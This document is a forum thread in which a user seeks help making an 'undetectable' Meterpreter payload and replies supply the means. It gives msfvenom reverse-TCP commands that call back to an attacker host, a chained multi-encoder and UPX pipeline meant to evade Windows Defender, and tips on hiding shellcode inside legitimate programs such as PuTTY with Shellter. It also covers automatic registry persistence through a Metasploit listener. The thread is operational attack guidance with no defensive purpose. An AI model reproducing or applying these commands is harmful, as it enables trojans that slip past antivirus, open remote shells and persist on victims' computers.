hi i need some help with creating a undetecable paylaod
the script i am using is
msfvenom -p windows/meterpreter/reversetcp LHOST=10.0.0.2 LPORT=4444 -f exe -e x86/shikataga_nai -i 200 > xxx.exe
after i create the payload i move it to a windows 10 64bit and its immediately pick it up .
i was wondering maybe it cuz of the x86 encoder ? even when i use veil-evasion the windows defender get it.
are there better encoder / crypter known in kali then i am missing ?
the only way i get pass my windows defender is by usnig shellter but then i dont get a meterpreter shell back ...
7 Responses
Use veil-evasion, very similar to msfvenom. In my experience much higher success rate with veil-evasion against AV.
i dont know why but veil-evasion cant pass my windows defender
Well, the most straight forward solution would be to create your own shellcode and embed it into a legit software(i.e. PuTTy). But, what else you can do is to encode it multiple times( like this:
msfvenom -p windows/meterpreter/reversetcp LHOST= LPORT=31337 -f raw -e shikataganai -i 5 | msfvenom -a x86 --platform windows -e x86/alphaupper -i 4 -f raw | msfvenom -a x86 --platform windows -e x86/shikataganai -i 6 -f raw | msfvenom -a x86 --platform windows -e x86/countdown -i 5 -f raw | msfvenom -a x86 --platform windows -e x86/shikataganai -i 9 -f raw | msfvenom -a x86 --platform windows -e x86/countdown -i 9 -f exe -o /root/.exe;upx -9 -v -o /root/.exe /root/.exe)
and add a -k option and add a program of your choice to run with the payload.
tried the script... windows defender still eats it up... any other suggestions?
Have you checked out my tutorial? Instead of Msfvenom or Veil, use Metasploit to create a raw payload. Then use Shellter with either a created exe you create in Windows, or another 32bit exe with your payload created by Metasploit. https://null-byte.wonderhowto.com/how-to/create-undetectable-trojan-using-domain-name-0171563/
combining the payload with a legitimate exe will get past defender. however persistence connection (as far as i know) requires the payload to be uncombined and THAT gets chewed up by defender. any other ideas?
For persistence, use the Registry persistence exploit. Found in Exploit/Windows/Local/registry (underscore) persistence
I like to set it up in the listener so it automatically gets persistence when a session is created. After typing your listener info and before typing exploit -j , type set autorunscript exploit/windows/local /registry-persistence Lhost=IP Lport=port
Then exploit -j
Share Your Thoughts